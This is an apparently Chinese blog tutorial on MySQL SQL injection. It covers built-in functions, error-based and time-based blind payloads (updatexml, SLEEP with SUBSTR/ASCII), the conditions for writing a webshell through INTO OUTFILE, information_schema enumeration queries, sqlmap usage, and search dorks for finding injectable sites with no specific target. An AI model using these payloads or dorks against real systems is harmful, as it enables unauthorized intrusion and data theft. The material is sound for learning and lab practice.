目录
前言
对于sql注入,大家肯定不会陌生,就是我们构造一些包含恶意的SQL语句在可以跟数据库做交互的地方运行,从而达到目的。当然,我们也接触了各种不同的数据库,如MySQL、MSSQL之类的,但最为常见的应该就是MySQL这一类的数据库了,接下来,我们来更深入的了解SQL注入,让你的技术在提升一个水平。接下来会
MySQL注入函数
先了解常用的那些函数,在对这些函数进行一个认识。
常用函数
MySQL有许多内置的函数,这些函数通常可以让我们更快捷的得到想要的信息
select SYSTEM_USER();#系统用户名
select USER();#用户名
SELECT CURRENT_USER();#当前用户名
SELECT SESSION_USER();#链接数据库的用户名
SELECT DATABASE();#数据库名
SELECT VERSION();#数据库版本
select @@datadir;#数据库路径
SELECT @@basedir;#数据库安装路径
SELECT @@version_compile_os;#操作系统
#count();返回执行结果数量
SELECT COUNT(User) from mysql.user;字符串函数
#concat() 没有分割的链接字符串
SELECT CONCAT(username,`password`) FROM users;
#CONCAT_WS() 含有分分隔符地连接字符串,需要指定连接符,也可以使用16进制的ASCII码
SELECT CONCAT_WS(0x7e,username,`password`) FROM users
#GROUP_CONCAT() 连接每一个组的所有字符串,并以都好分割每一条数据
SELECT GROUP_CONCAT(username) from users;
#ascii() 字符串的ASCII代码值
#ord() 返回字符串第一个字符的ASCII值
#mid()返回一个字符串的一部分
#substr()返回一个字符串的一部分,功能基本一致
#length()返回字符串的长度
SELECT MID('字符串‘,起始位置,截取长度)
#left() 返回字符串最左面的几个字符
#floor() 返回小于或等于x的最大整数
#rand() 返回0和1之间的一个随机数读写文件
#load_file()读取本地文件
#into outfile()写文件
#注意secure_file_priv的值
SELECT 'mysql' INTO OUTFILE '/tmp/mysql
SELECT LOAD_FILE('/tmp/mysql')
#可利用此函数写一句话,读取配置文件SELECT … INTO OUTFILE 导出数据到文件,这里稍微提以下,就是这个写入shell的三个条件
-
用户具有FILE权限
-
secure_file_priv如果非空,则只能在对应的目录下写入文件
-
输出不能是一个已存在的文件
查询secure_file_priv值的语句为show variables like '%secure%';
当secure_file_priv=null时,说明当前不可写入,如果需要更改只需要在my.ini文件中更改值为=“ ”即可。
高级函数
#EXTRACTVALUE (XML_document, XPath_string); 从目标XML中返回包含所查询值的字符串。
#XML_document是String格式,为XML文档对象的名称,文中为Doc
#XPath_string (Xpath格式的字符串)
#UpdateXml(XML_document, XPath_string, new_value),这个函数有3个参数
#XML_document是String格式,为XML文档对象的名称,文中为Doc
#XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。
#new_value,String格式,替换查找到的符合条件的数据
#作用:从目标XML中返回包含所查询的字符串
#这两个函数功能类似,一个是查询,一个是更新。由于要求第二个参数为xpath格式字符串,如果输入的不是该格式,就会引起报错,可进行报错注入
#sleep() 让此语句运行N秒钟
#if(),需要3个值,第一个值为一个表达式,如果表达式结果为真返回第二个参数,结果为假返回第三个参数
#char() 返回整数ASCII代码字符代表的字符串
#strcmp() 比较字符串内容,实际上比较的为字符串对应的ASCII码,结果为-1、0、1
#ifnull() 两个参数,第一个参数不为null直接返回,否则返回第二个参数
#exp() 返回e的x次方运算符
算术运算符
+、-、*、/ 这几个不用解释,%:求余,DIV:除法运算,同’”/“,MOD:求余运算,同”%”。
比较运算符
‘>’、’<’、’=’、’>=’、’<=’和数学上同理
#!=或者<>:不等于
#is null :为空
#is not null:不为空
#BETWEEN AND :在……之间
#IN:包含
#Not IN :不包含
#LIKE :模式匹配
select id,username from users where username like '%d%';
#这里的'%'代表任意匹配
#NOT LIKE :和上个句子类似
#REGEXP :正则表达式逻辑运算符
&&或AND、||或OR、!或NOT、XOR分别代表与、或、非、异或
在SQL注入的过程中,使用逻辑运算符判断语句是否被执行,从而判断是否有注入点
(一个小tips)
我们举一个最熟知的例子,就是万能密码,我们都知道构造一个逻辑值,就能在过滤不严格的情况下直接无需密码的登入。这个是怎么做到的呢?下面来简单的示范一下语句的执行过程。
注入语句样例分析
SELECT USER() REGEXP '^ro'
#匹配正则表达式
SELECT ASCII(SUBSTR((select user()),1,1))=114
#执行select user()查询用户,使用subst去结果的第一个字符,转换为ASCII码和114比较是否相等,r的ASCII码是114
SELECT if(ASCII(SUBSTR((SELECT USER()),1,1))=114,0,SLEEP(5))
#和上面的语句类似,只不过加上了IF语句,如果相等返回0,否则延迟5秒
SELECT ASCII( SUBSTR(( SELECT table_name FROM information_schema.`TABLES` WHERE TABLE_schema = DATABASE () LIMIT 0, 1 ),1,1 ))=9
#" SELECT table_name FROM information_schema.`TABLES` WHERE TABLE_schema = DATABASE() LIMIT 0,1"这条语句利用元数据获取当前数据的第一个表,使用SUBstr进行切割,获取第一个字符,进行ASCII码转换,比较结果
select updatexml(1,concat(0x7e,(select @@version),0x7e),1);
#由于第二个参数不是XPath格式的数据类型,而是进行的版本查询,使用cocat进行了拼接,mysql给出了报错的语法错SQL注入的流程
寻找注入点
这里我们就直接干脆的利用语法搜寻,更容易展示:
-
无特定目标:使用搜索引擎
inurl:.php?id=1 -
有特定目标:使用搜索引擎
inurl:.php?id= site:target.com -
工具:spider,爬虫,对搜索引擎和目标网站的链接进行爬取
注入方式
-
手工识别:加 ‘ 引发报错,使用and语句判断语句是否被执行
and 1=1 /and 1=2and '1'='1 /and '1'='2and 1 like 1 / and 1 kike 2 -
工具识别
sqlmap -m filename(filename中保存检测目标)
sqlmap --crawl(sqlmap对目标网站进行爬去,然后依次进行测试)
-
高级识别
-
BurpSuite+SQLmap
BurpSuite拦截浏览器访问提交的数据,使用扩展插件,直接调用Sqlmap进行测试
-
sqlmap -level增加测试级别,对header中相关参数也进行测试,比如cookie等参数 -
sqlmap -r filename,filename中为网站请求数据,必输GET请求,POST请求 -
扩展识别广度和深度
-
利用工具提高识别效率
拿数据库总结
-
信息搜集阶段:利用内置函数搜集信息
-
数据获取阶段:通过语句查询找到关键的内容,或通过暴力破解(比如遍历ASCII码来猜测)
-
提权阶段:利用本身数据库的权限,或读写文件提权
MySQL的内置库
什么是内置库?
就是MySQL中本身就会自带的数据库,里面存储这各种信息、数据。在MySQL>=5.7的时候,就会有4个默认的内置库。
-
mysql:保存账户信息,权限信息,存储过程,event,时区等信息
-
sys:包含一系列的存储过程,自定义函数以及视图来帮助我们快速的了解系统元数据信息(元数据:关于数据的数据)
-
performance_schema :用于搜集数据库服务器性能参数
-
information_schema:提供访问数据库元数据的方式,保存着关于Mysql服务器所维护的所有其他数据库信息。
MySQL注入的核心原理:通过MySQL内置的information_schema库可以了解整个Mysql的运行情况,查看到数据库的所有数据信息。我们主要就是构造函数,调用运行这个库的相关函数功能。
information_schema
这里就简单的阐述整理一下该库的功能,以及能做那些事。
information_schema可以理解成信息信息数据库,保存着数据库的数据。
- - SCHEMATA 表:提供了当前mysql实例中所有数据库的信息。
- show databases的结果取之此表。
- - TABLES 表:提供了关于数据库中的表的信息。详细表述了某个表属于哪个
- schema,表类型,表引擎,创建时间等信息。
- show tables from schemaname的结果取之此表。
- - COLUMNS 表:提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息。
例如:show columns from schemaname.tablename的结果取之此表。
总结
在我们不知道任何信息的前提下,可以整理以下思路步骤,通过information_schema中内置的函数来引出有用的信息
SELECT schema_name from information_schema.SCHEMATA #查库
SELECT TABLE_name from information_schema.`TABLES` WHERE TABLE_schema='库名' #查表
SELECT COLUMN_NAME FROM information_schema.`COLUMNS` where table_name='表名' #查列
SELECT 列名 FROM 库名.表名 #查数据希望各位能有一些收获,这边也推荐一个sql练习的靶场,很好用!
sqli-llabs在GitHub上面就有。
8707
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
